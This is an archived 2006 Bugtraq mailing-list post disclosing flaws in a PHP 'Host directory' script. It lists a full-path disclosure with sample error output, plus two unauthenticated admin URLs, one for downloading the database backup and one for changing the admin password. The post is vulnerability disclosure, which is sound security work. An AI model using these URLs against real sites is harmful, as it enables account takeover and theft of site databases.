Host directory full disclosure and input error

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Host directory full disclosure and input error
From: hack2prison@xxxxxxxxx
Date: 27 Dec 2006 11:05:47 -0000
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

Host directory is a product of scriptsfrenzy.com and alstrasoft.com
I check lastest version and maybe infected lower versions. I contacted 
vendor 5 times in 2 months but not received any replies.
- FullPath disclosure: http://site.ext/path/ANY_INCORRECT_LINK
Warning: main(/home/user/public_html/include/ANY_INCORRECT_LINK.php): 
failed to open stream: No such file or directory in 
/home/user/public_html/include/main.php on line 25
- Backup database bypass: http://site.ext/path/admin/backup/db
- Change admin password without login: 
http://site.ext/path/admin/config

Prev by Date: Re: XSS with Vbulletin (new idea !)
Next by Date: Secure Login Manager Multiple Input Validation Vulnerabilities
Previous by thread: [OpenPKG-SA-2006.043] OpenPKG Security Advisory (links)
Next by thread: Secure Login Manager Multiple Input Validation Vulnerabilities
Index(es):
- Date
- Thread